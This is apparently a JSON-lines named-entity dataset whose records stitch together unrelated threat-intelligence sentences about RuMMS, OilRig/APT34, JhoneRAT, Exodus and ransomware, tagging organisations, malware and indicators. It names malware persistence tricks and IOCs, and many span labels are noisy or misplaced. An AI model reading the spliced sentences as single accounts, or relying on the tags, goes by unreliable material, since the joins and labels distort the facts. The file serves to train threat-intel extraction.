Mandiant has observed UNC2970 , APT43 , and UNC4899 all utilize similar infrastructure .", "spans": [{"start": 89, "end": 94, "label": "Organization"}, {"start": 348, "end": 414, "label": "Indicator"}]} {"text": "During our investigation , we observed the C2 server sending multiple \u201c balance \u201d commands to different institutions , presumably to query the victim \u2019 s financial account balances . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region . Moreover , this kind of infrastructure uses HTTPS and the flow is encrypted that makes man-in-the-middle interception more complicated for the defender . Indicators of attack are similar to IOCs , but rather than focusing on forensic analysis of a compromise that has already taken place , indicators of attack focus on identifying attacker activity while an attack is in process .", "spans": [{"start": 187, "end": 199, "label": "Organization"}, {"start": 206, "end": 211, "label": "Organization"}, {"start": 214, "end": 226, "label": "Organization"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 360, "end": 365, "label": "Indicator"}, {"start": 506, "end": 510, "label": "Indicator"}, {"start": 541, "end": 603, "label": "Indicator"}]} {"text": "RuMMS can upload responses to the balance inquiries ( received via SMS message ) to the remote C2 server , which can send back additional commands to be sent from the victim to the provider \u2019 s payment service . We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame . It is not the first time an attacker used only cloud providers . 
Since 2021 , there have been multiple leaks of ransomware source code and builders components that are essential to creating and modifying ransomware .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 384, "end": 399, "label": "System"}, {"start": 431, "end": 471, "label": "Vulnerability"}]} {"text": "These could include resetting the user \u2019 s PIN , enabling or disabling various alerts and confirmations , and confirming the user \u2019 s identity . Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East . Even while using these services , the authors of this JhoneRAT went further and used different user-agent strings depending on the request , and even on the downloaders the authors used other user-agent strings . Monitor MSSQL Servers with access to OT systems and networks for evidence of : \u2022 Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": [{"start": 173, "end": 180, "label": "Organization"}, {"start": 214, "end": 226, "label": "Organization"}, {"start": 257, "end": 274, "label": "Organization"}, {"start": 350, "end": 358, "label": "Malware"}, {"start": 590, "end": 662, "label": "Indicator"}]} {"text": "RuMMS Samples , C2 , Hosting Sites , Infections and Timeline In total we captured 297 RuMMS samples , all of which attempt to contact an initial C2 server that we extracted from the app package . The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented . We already published a couple of articles about ROKRAT ( here , here , here and here ) where another unrelated actor , Group123 , made the same choice but with different providers . 
Other interesting anomalies in June include 47 attacks on the Manufacturing industry ( which usually averages around 20 attacks a month ) and notable increases in attacks on Switzerland ( 14 ) and Brazil ( 13 ) , both of which are normally attacked only two or three times a month .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 86, "end": 91, "label": "Malware"}, {"start": 207, "end": 229, "label": "System"}, {"start": 264, "end": 276, "label": "Organization"}, {"start": 360, "end": 366, "label": "Malware"}, {"start": 431, "end": 439, "label": "Organization"}, {"start": 556, "end": 578, "label": "Organization"}]} {"text": "Figure 7 lists the IP addresses of these C2 servers , the number of RuMMS apps that connect to each of them , and the example URL used as the first parameter of the HttpPost operation ( used in the code of Figure 3 ) . The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye . The attacker implemented filtering based on the keyboard 's layout . We 'll delve into the recent four - month spike in attacks against the UK , the unsettling uptick in attacks on France 's government sector , and how Germany retained its spot as the fourth most targeted country in the world .", "spans": [{"start": 68, "end": 73, "label": "Malware"}, {"start": 243, "end": 262, "label": "System"}, {"start": 270, "end": 279, "label": "System"}, {"start": 307, "end": 319, "label": "Organization"}, {"start": 328, "end": 351, "label": "Organization"}, {"start": 356, "end": 363, "label": "Organization"}, {"start": 506, "end": 508, "label": "Organization"}, {"start": 547, "end": 574, "label": "Organization"}, {"start": 585, "end": 592, "label": "Organization"}]} {"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37.1.207.31 ) was the most heavily used . 
A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation . The malware is executed only for the following layout , the country is based on the Microsoft website : Cyberattacks can leave companies wondering how could this happen to us so , when these situations arise , it can help to know what might be motivating these attackers .", "spans": [{"start": 79, "end": 90, "label": "Indicator"}, {"start": 179, "end": 191, "label": "Organization"}, {"start": 201, "end": 218, "label": "System"}, {"start": 281, "end": 299, "label": "System"}, {"start": 386, "end": 395, "label": "Organization"}]} {"text": "Figure 7 . All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East . ' 0401 ' : Saudi Arabia . ' 0801 ' : Iraq . ' 0c01 ' : Egypt . ' 1001 ' : Libya . ' 1401 ' : Algeria . ' 1801 ' : Morocco . ' 1c01 ' : Tunisia . ' 2001 ' : Oman . ' 2401 ' : Yemen . ' 2801 ' : Syria . ' 3801 ' : UAE . ' 3401 ' : Kuwait . ' 3c01 ' : Bahrain . ' 3001 ' : Lebanon . But , IOCs are not always easy to detect they can be as simple as metadata elements or incredibly complex malicious code and content samples .", "spans": [{"start": 100, "end": 117, "label": "Organization"}, {"start": 491, "end": 508, "label": "Indicator"}, {"start": 512, "end": 565, "label": "Indicator"}]} {"text": "RuMMS samples and C2 servers Figure 8 shows how these samples , C2 servers and hosting websites are related to each other , including when they were compiled or observed . This latest attack consisted of three waves between May and June 2018 . We identified three malicious Microsoft Office B-IDTY I-TOOL documents that download and load an additional Office document with a Macro . \u201c And his access was never shut off until today ? 
, \u201d asked the company \u2019s general counsel Mike Dacks .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 274, "end": 283, "label": "System"}, {"start": 375, "end": 380, "label": "System"}, {"start": 447, "end": 473, "label": "Organization"}, {"start": 474, "end": 484, "label": "Organization"}]} {"text": "In the quadrant , the smaller boxes in blue-gray represent particular apps in the RuMMS family , while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps . The OilRig group continues to be a persistent adversary group in the Middle East region . The oldest one from November 2019 , named \" Urgent.docx \" . Mandiant has identified zero - day exploitation of this vulnerability in the wild beginning in late August 2023 as well as n - day exploitation after Citrix \u2019s publication .", "spans": [{"start": 82, "end": 87, "label": "Malware"}, {"start": 167, "end": 172, "label": "Malware"}, {"start": 184, "end": 196, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 314, "end": 325, "label": "Indicator"}, {"start": 330, "end": 338, "label": "Organization"}, {"start": 354, "end": 377, "label": "Vulnerability"}]} {"text": "The dotted arrows represent the use of a particular C2 server by a specific app to send information and fetch instructions . APT34 are involved in long-term cyber espionage operations largely focused on the Middle East . The author of the document asks to enable editing in English and in Arabic . Such non - native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post - intrusion cleanup process .", "spans": [{"start": 125, "end": 130, "label": "Organization"}]} {"text": "In this figure we have 11 RuMMS samples , all of which were hosted on the website as shown in the \u201c y \u201d axis . 
This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications . The second document from the beginning of January is named \" fb.docx \" and contains usernames and passwords from an alleged \" Facebook \" leak . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": [{"start": 26, "end": 31, "label": "Malware"}, {"start": 116, "end": 128, "label": "Organization"}, {"start": 202, "end": 211, "label": "Organization"}, {"start": 214, "end": 224, "label": "Organization"}, {"start": 227, "end": 233, "label": "Organization"}, {"start": 236, "end": 244, "label": "Organization"}, {"start": 251, "end": 269, "label": "Organization"}, {"start": 333, "end": 340, "label": "Indicator"}, {"start": 398, "end": 406, "label": "System"}]} {"text": "The dates on the \u201c x \u201d axis show the dates when we first saw these apps in the wild . Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 . The more recent document is from mid-January and alleged to be from a United Arab Emirate organization . 
Babuk , a Russian ransomware group that emerged in 2021 , has conducted a series of high - profile ransomware attacks across various industries , including government , healthcare , logistics , and professional services .", "spans": [{"start": 111, "end": 130, "label": "Organization"}, {"start": 175, "end": 209, "label": "Organization"}, {"start": 280, "end": 292, "label": "Organization"}, {"start": 590, "end": 600, "label": "Organization"}, {"start": 613, "end": 623, "label": "Organization"}, {"start": 626, "end": 636, "label": "Organization"}, {"start": 639, "end": 648, "label": "Organization"}, {"start": 655, "end": 676, "label": "Organization"}]} {"text": "This figure demonstrates the following interesting information : The time range when threat actors distributed RuMMS on those shared-hosting websites is from January 2016 to March 2016 . Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs . The author blurred the content and asks the user to enable editing to see the content . Legacy Task Name QcWBX Command to Run C:\\Windows\\msserver.exe", "spans": [{"start": 111, "end": 116, "label": "Malware"}, {"start": 232, "end": 244, "label": "Organization"}, {"start": 291, "end": 309, "label": "Organization"}, {"start": 346, "end": 371, "label": "Organization"}, {"start": 376, "end": 384, "label": "Organization"}, {"start": 519, "end": 542, "label": "Indicator"}]} {"text": "Threat actors used different websites to host different payloads at different times . On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East . In the three documents , an additional Office document containing a Macro is downloaded and executed . 
Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": [{"start": 108, "end": 115, "label": "Organization"}, {"start": 129, "end": 135, "label": "Organization"}, {"start": 136, "end": 148, "label": "Organization"}, {"start": 175, "end": 191, "label": "Organization"}, {"start": 258, "end": 273, "label": "System"}, {"start": 287, "end": 292, "label": "System"}, {"start": 440, "end": 456, "label": "Vulnerability"}]} {"text": "This kind of \u201c moving target \u201d behavior made it harder to track their actions . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics . The documents are located on Google Drive . Malwarebytes found that a total of 48 separate ransomware groups attacked the US in the observed period .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 100, "end": 127, "label": "System"}, {"start": 179, "end": 199, "label": "System"}, {"start": 310, "end": 322, "label": "System"}, {"start": 325, "end": 337, "label": "Organization"}, {"start": 349, "end": 428, "label": "Indicator"}]} {"text": "The same websites have hosted different RuMMS samples at different dates . Just over a week later , on January 16 , 2018 , we observed an attack on a Middle Eastern financial institution . The template located on Google Drive contains a macro . 
On multiple systems , XPdb entries for the malware contained the parent process of the JumpCloud agent , further evidence that the threat actor leveraged JumpCloud to gain initial access to victim environments .", "spans": [{"start": 40, "end": 45, "label": "Malware"}, {"start": 165, "end": 186, "label": "Organization"}, {"start": 213, "end": 225, "label": "System"}, {"start": 237, "end": 242, "label": "System"}, {"start": 267, "end": 271, "label": "System"}]} {"text": "C2 servers are shared by multiple samples . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 . The macro contains a virtual machine detection technique based on the serial number of the disks available in the victim environment . This is consistent with the group \u2019s prior activity scanning and exploiting internet facing servers for initial access .", "spans": [{"start": 87, "end": 117, "label": "Malware"}, {"start": 155, "end": 161, "label": "Organization"}]} {"text": "This matches our observations of C2 servers as shown in Figure 7 . However , the attack on January 16 did not involve ThreeDollars at all . Indeed , some VMs do not have serial numbers and the macro is executed only if a serial number exists . Ashley Madison \u2019s parent company \u2014 Toronto - based Avid Life Media \u2014 filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": [{"start": 118, "end": 130, "label": "System"}, {"start": 154, "end": 157, "label": "System"}, {"start": 244, "end": 258, "label": "Organization"}, {"start": 295, "end": 310, "label": "Organization"}, {"start": 402, "end": 417, "label": "Organization"}]} {"text": "Figure 8 . Interestingly , the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017 . 
A WMIC command is executed to get this information on the targeted system . Mandiant identified sh3.exe as a utility suspected to run the Mimikatz LSADUMP command .", "spans": [{"start": 111, "end": 123, "label": "Organization"}, {"start": 155, "end": 159, "label": "System"}, {"start": 249, "end": 256, "label": "System"}]} {"text": "RuMMS samples , hosting sites , C2 servers from Jan. 2016 to Mar . Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email . If a serial number exists , the rest of the code is executed . CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 77, "end": 83, "label": "Organization"}, {"start": 118, "end": 131, "label": "System"}, {"start": 273, "end": 305, "label": "Organization"}, {"start": 433, "end": 456, "label": "Organization"}]} {"text": "2016 We do not know exactly how many people have been infected with RuMMS malware ; however , our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016 . In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 . The purpose is to download an image from a new Google Drive link . These types of threat actors will be attempting to cause the most embarrassment andor pain to prove the company can not function without them .", "spans": [{"start": 68, "end": 73, "label": "Malware"}, {"start": 158, "end": 163, "label": "Malware"}]} {"text": "Figure 9 shows the number of RuMMS infections recorded in the last four months . On January 8 , 2018 , the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East . 
It is interesting to note that the filename of the downloaded image is randomly generated based on a dictionary : Array (\"cartoon\" , \"img\" ,\"photo\") . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": [{"start": 29, "end": 34, "label": "Malware"}, {"start": 107, "end": 113, "label": "Organization"}, {"start": 114, "end": 126, "label": "Organization"}, {"start": 200, "end": 216, "label": "Organization"}, {"start": 436, "end": 462, "label": "System"}, {"start": 465, "end": 474, "label": "Organization"}]} {"text": "When we first observed the malware in January , we recorded 380 infections . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars . The filename will be cartoon.jpg or img.jpg or photo.jpg and the image usually depicts a cartoon . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 117, "end": 139, "label": "Malware"}, {"start": 163, "end": 177, "label": "System"}, {"start": 199, "end": 211, "label": "System"}, {"start": 235, "end": 246, "label": "Indicator"}, {"start": 250, "end": 257, "label": "Indicator"}, {"start": 261, "end": 270, "label": "Indicator"}, {"start": 326, "end": 342, "label": "Vulnerability"}, {"start": 417, "end": 433, "label": "Vulnerability"}]} {"text": "In February , we recorded 767 infections . This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic . 
The image file is a real image with a base64-encoded binary appended at the end . Better yet , reach out to us , and well be pleased to share a customized demonstration of the ThreatConnect Platform .", "spans": [{"start": 161, "end": 167, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 246, "end": 255, "label": "Organization"}, {"start": 471, "end": 495, "label": "System"}]} {"text": "In March , it peaked at 1,169 infections . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot . The malware author has a curious sense of humor . Ways our customers can detect and block this threat are listed below .", "spans": [{"start": 80, "end": 92, "label": "System"}, {"start": 152, "end": 167, "label": "Malware"}]} {"text": "In April , at the time of writing this post , we recorded 413 RuMMS infections . The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro . The base64 data and image are separated by the \" **** \" string . School budgets are tight and institutions are understandably keen to direct their budgets at things that directly benefit pupils .", "spans": [{"start": 62, "end": 67, "label": "Malware"}, {"start": 96, "end": 108, "label": "System"}, {"start": 441, "end": 453, "label": "Organization"}]} {"text": "Although the propagation trend seems to be slowing down a bit , the figure tells us that RuMMS malware is still alive in the wild . Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group . The decoded binary filename is also randomly generated based on a dictionary : Array(\"proc\" , \"chrome\" , \"winrar\") . 
None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": [{"start": 89, "end": 94, "label": "Malware"}, {"start": 236, "end": 248, "label": "Organization"}]} {"text": "We continue to monitor its progress . ] com , which we previously identified in October 2017 to be an OilRig C2 . It can be proc.exe or chrome.exe or winrar.exe . External Server Requests Indicates an attempt to exfiltrate data to an external server .", "spans": [{"start": 102, "end": 108, "label": "Organization"}, {"start": 124, "end": 132, "label": "Indicator"}, {"start": 136, "end": 146, "label": "Indicator"}, {"start": 150, "end": 160, "label": "Indicator"}, {"start": 163, "end": 187, "label": "Indicator"}]} {"text": "Conclusion Smishing ( SMS phishing ) offers a unique vector to infect mobile users . Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks . The decoded base64 data is an AutoIT binary . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 148, "end": 160, "label": "Organization"}, {"start": 171, "end": 192, "label": "System"}, {"start": 197, "end": 217, "label": "System"}, {"start": 229, "end": 246, "label": "Organization"}, {"start": 326, "end": 332, "label": "System"}, {"start": 423, "end": 463, "label": "System"}, {"start": 521, "end": 529, "label": "System"}]} {"text": "The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware . Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 . 
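The IIS mitigation the page describes (drop the request when the decoded URI matches a regex) and the later observation that requests reached the back end through the OWA endpoint instead can be checked against constructed URIs. This is an added example written for this page, not code from Microsoft, CrowdStrike or the page itself: the regex is assumed in the shape of Microsoft's published two-lookahead condition (the page quotes no pattern), the request URIs are constructed, and the /owa/ sample only stands in for "a request that does not carry the Autodiscover token"; it is not the exploit request, which the page does not detail.

```python
import re
from urllib.parse import unquote

# Assumed pattern in the shape of the Microsoft-published ProxyNotShell URL
# Rewrite condition: the decoded URI must contain both "autodiscover.json" and
# "powershell". The page quotes no regex; this one is an illustration.
ENDPOINT_RULE = re.compile(r"(?=.*autodiscover\.json)(?=.*powershell)", re.IGNORECASE)

# Broader, assumed variant keyed on the PowerShell token alone, so it is not
# tied to one front-end path (it will also match legitimate remote PowerShell).
BROAD_RULE = re.compile(r"powershell", re.IGNORECASE)


def decode_once(uri: str) -> str:
    """One round of percent-decoding."""
    return unquote(uri)


def decode_fully(uri: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing, so a double-encoded
    token (%2570 -> %70 -> p) cannot hide from the check. max_rounds bounds
    pathological input."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def rule_drops(uri: str, rule=ENDPOINT_RULE, decoder=decode_fully) -> bool:
    """True when the rewrite rule would drop the request: the regex matches the
    decoded URI, which is what the page says the IIS rule is evaluated against."""
    return rule.search(decoder(uri)) is not None


def single_decode_drops(uri: str) -> bool:
    """Endpoint rule evaluated after a single decode only."""
    return rule_drops(uri, ENDPOINT_RULE, decode_once)


def broad_rule_drops(uri: str) -> bool:
    """Assumed broad rule evaluated on the fully decoded URI."""
    return rule_drops(uri, BROAD_RULE, decode_fully)


# Constructed request URIs (not captured traffic). The last one stands in for
# a request that reaches the back end via the /owa/ path rather than
# Autodiscover; it is not the request the page's OWA finding refers to.
SAMPLE_URIS = [
    "/autodiscover/autodiscover.json?a@b/powershell",
    "/autodiscover/autodiscover.json?a%40b%2Fpowershell",
    "/autodiscover/autodiscover.json?a=%2570owershell",
    "/owa/example/powershell",
]


def evaluate(uris=SAMPLE_URIS):
    """Map each URI to (endpoint rule, endpoint rule with single decode, broad rule)."""
    return {u: (rule_drops(u), single_decode_drops(u), broad_rule_drops(u)) for u in uris}


if __name__ == "__main__":
    for uri, verdict in evaluate().items():
        print(f"{uri:50} endpoint={verdict[0]} single_decode={verdict[1]} broad={verdict[2]}")
```

Two things fall out of running it: the endpoint rule never fires on the /owa/ sample because its first lookahead is anchored to the Autodiscover token, which is the structural reason a path-scoped rewrite rule cannot cover a second front-end path to the same back end; and the double-encoded sample is only caught when the URI is decoded to a fixed point, so a rule evaluated after one decode is weaker than one evaluated on the fully decoded string.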
This binary downloads a new file on Google Drive . We were able to find additional links between Hack520 \u2019s \u201c Pig network \u201d and the Winnti group \u2019s activities .", "spans": [{"start": 11, "end": 16, "label": "Malware"}, {"start": 231, "end": 237, "label": "Organization"}, {"start": 337, "end": 349, "label": "System"}, {"start": 398, "end": 424, "label": "Organization"}, {"start": 433, "end": 445, "label": "Organization"}]} {"text": "In addition , the use of shared-hosting providers adds flexibility to the threat actor \u2019 s campaign and makes it harder for defending parties to track these moving targets . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 . The filename is also randomly generated based on a dictionary $ARRAY[5]=[\"prc\" ,\"winrar\" ,\"chrome\" ,\"sync\" ,\"COM surr\"] . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": [{"start": 257, "end": 278, "label": "Malware"}, {"start": 455, "end": 462, "label": "Organization"}, {"start": 509, "end": 525, "label": "Organization"}, {"start": 595, "end": 599, "label": "Organization"}]} {"text": "Fortunately , FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples , and help us quickly identify the threat . The OilRig group continues to remain a highly active adversary in the Middle East region . The final payload is a remote access tool ( RAT ) written in python . 
Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": [{"start": 14, "end": 46, "label": "System"}, {"start": 127, "end": 132, "label": "Malware"}, {"start": 189, "end": 201, "label": "Organization"}, {"start": 299, "end": 317, "label": "System"}, {"start": 320, "end": 323, "label": "System"}, {"start": 337, "end": 343, "label": "System"}, {"start": 364, "end": 380, "label": "System"}, {"start": 420, "end": 436, "label": "System"}, {"start": 526, "end": 539, "label": "System"}]} {"text": "To protect yourself from these threats , FireEye suggests that users : Take caution before clicking any links where you are not sure about the origin . Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 . We named this RAT \" JhoneRAT \" . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": [{"start": 41, "end": 48, "label": "Organization"}, {"start": 224, "end": 232, "label": "Organization"}, {"start": 264, "end": 267, "label": "System"}, {"start": 270, "end": 278, "label": "Malware"}, {"start": 288, "end": 296, "label": "Organization"}, {"start": 326, "end": 354, "label": "Organization"}, {"start": 374, "end": 429, "label": "Organization"}]} {"text": "Don \u2019 t install apps outside the official app store . The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . The python code is wrapped into an executable using pyinstaller . 
The commandline parameters m and h are mutually exclusive .", "spans": [{"start": 58, "end": 63, "label": "Organization"}, {"start": 125, "end": 134, "label": "Organization"}, {"start": 137, "end": 147, "label": "Organization"}, {"start": 150, "end": 156, "label": "Organization"}, {"start": 159, "end": 167, "label": "Organization"}, {"start": 170, "end": 188, "label": "Organization"}, {"start": 216, "end": 222, "label": "System"}, {"start": 278, "end": 335, "label": "Indicator"}]} {"text": "Exodus : New Android Spyware Made in Italy Mar 29 Summary We identified a new Android spyware platform we named Exodus , which is composed of two stages we call Exodus One and Exodus Two . Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 . It uses minimal obfuscation applied only on variables and function naming . In terms of the fallout , it \u2019s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 13, "end": 20, "label": "System"}, {"start": 78, "end": 85, "label": "System"}, {"start": 112, "end": 118, "label": "Malware"}, {"start": 161, "end": 171, "label": "Malware"}, {"start": 176, "end": 186, "label": "Malware"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 238, "end": 244, "label": "Organization"}, {"start": 249, "end": 273, "label": "Organization"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 342, "end": 347, "label": "Organization"}, {"start": 487, "end": 491, "label": "Organization"}]} {"text": "We have collected numerous samples spanning from 2016 to early 2019 . The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government . The RAT starts by launching three threads . 
Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": [{"start": 192, "end": 199, "label": "Organization"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 268, "end": 271, "label": "System"}]} {"text": "Instances of this spyware were found on the Google Play Store , disguised as service applications from mobile operators . APT34 uses a mix of public and non-public tools ( Fig.2 ) and often uses compromised accounts to conduct spear-phishing operations . The first is responsible for checking if the system has the targeted keyboard layout \u2014 this is exclusively in Arabic-speaking countries . Our 2023 Ransomware Report unpacks the action in four zones : the US , Germany , France , and the UK .", "spans": [{"start": 44, "end": 61, "label": "System"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 142, "end": 169, "label": "System"}, {"start": 195, "end": 215, "label": "System"}, {"start": 402, "end": 412, "label": "Malware"}]} {"text": "Both the Google Play Store pages and the decoys of the malicious apps are in Italian . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . The second will create the persistence and , finally , the last one to be started is the main cycle for the RAT . 
Financial extrinsic Theft of personally identifiable information PII that is then monetized is a classic example of financial motivation of cyberattacks .", "spans": [{"start": 9, "end": 26, "label": "System"}, {"start": 106, "end": 111, "label": "Organization"}, {"start": 126, "end": 156, "label": "Vulnerability"}, {"start": 157, "end": 171, "label": "Vulnerability"}, {"start": 182, "end": 190, "label": "System"}, {"start": 195, "end": 206, "label": "System"}, {"start": 230, "end": 239, "label": "Organization"}, {"start": 365, "end": 368, "label": "System"}, {"start": 511, "end": 523, "label": "Organization"}]} {"text": "According to publicly available statistics , as well as confirmation from Google , most of these apps collected a few dozens installations each , with one case reaching over 350 . Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East . As we explained before , the RAT targets specific countries by checking the keyboard 's layout . 
We provide at - risk organizations with the following discovery methods to conduct threat hunts for tactics , techniques , and procedures ( TTPs ) implemented derived from the toolset : \u2022 Establish collection and aggregation of host - based logs for crown jewels systems such as human - machine interfaces ( HMI ) , engineering workstations ( EWS ) , and OPC client servers within their environments and review logs for the evidence of Python script or unauthorized code execution on these systems .", "spans": [{"start": 74, "end": 80, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 248, "end": 261, "label": "Organization"}, {"start": 436, "end": 439, "label": "System"}, {"start": 520, "end": 538, "label": "Organization"}, {"start": 783, "end": 815, "label": "System"}, {"start": 820, "end": 844, "label": "System"}, {"start": 847, "end": 850, "label": "System"}, {"start": 859, "end": 903, "label": "System"}, {"start": 928, "end": 1001, "label": "Indicator"}]} {"text": "All of the victims are located in Italy . When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group . In fact , this is one of the first checks it performs when it is executed . Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services ( HHS ) warning the healthcare industry about Rhysida ransomware activity .", "spans": [{"start": 202, "end": 214, "label": "Organization"}, {"start": 293, "end": 304, "label": "Organization"}, {"start": 354, "end": 406, "label": "Organization"}, {"start": 445, "end": 463, "label": "Malware"}]} {"text": "All of these Google Play Store pages have been taken down by Google . The email address is associated with the Lebanese domain of a major global financial institution . 
The persistence is achieved by adding an entry with the name \" ChromeUpdater \" to the ' Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run ' . From what we \u2019ve seen in Hack520 \u2019s blog , as well as the infrastructure deployed around it , it is quite safe to say that Hack520 is involved in aspects of the VPS service activity provided to groups like Winnti and other cybercriminals or threat actors .", "spans": [{"start": 13, "end": 30, "label": "System"}, {"start": 61, "end": 67, "label": "Organization"}, {"start": 145, "end": 166, "label": "Organization"}, {"start": 336, "end": 351, "label": "Organization"}, {"start": 472, "end": 483, "label": "System"}, {"start": 517, "end": 523, "label": "Organization"}, {"start": 552, "end": 565, "label": "Organization"}]} {"text": "We believe this spyware platform is developed by an Italian company called eSurv , which primarily operates in the business of video surveillance . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . This RAT uses three different cloud services to perform all its command and control ( C2 ) activities . The attackers only managed to deploy it to three machines on the organizations network and it was blocked on two of those three computers .", "spans": [{"start": 75, "end": 80, "label": "Organization"}, {"start": 148, "end": 156, "label": "System"}, {"start": 179, "end": 192, "label": "System"}, {"start": 213, "end": 226, "label": "Vulnerability"}, {"start": 234, "end": 237, "label": "System"}, {"start": 293, "end": 312, "label": "System"}, {"start": 315, "end": 317, "label": "System"}, {"start": 333, "end": 346, "label": "Organization"}]} {"text": "According to public records it appears that eSurv began to also develop intrusion software in 2016 . In July 2017 , we observed the OilRig group using a tool they developed called ISMAgent in a new set of targeted attacks . 
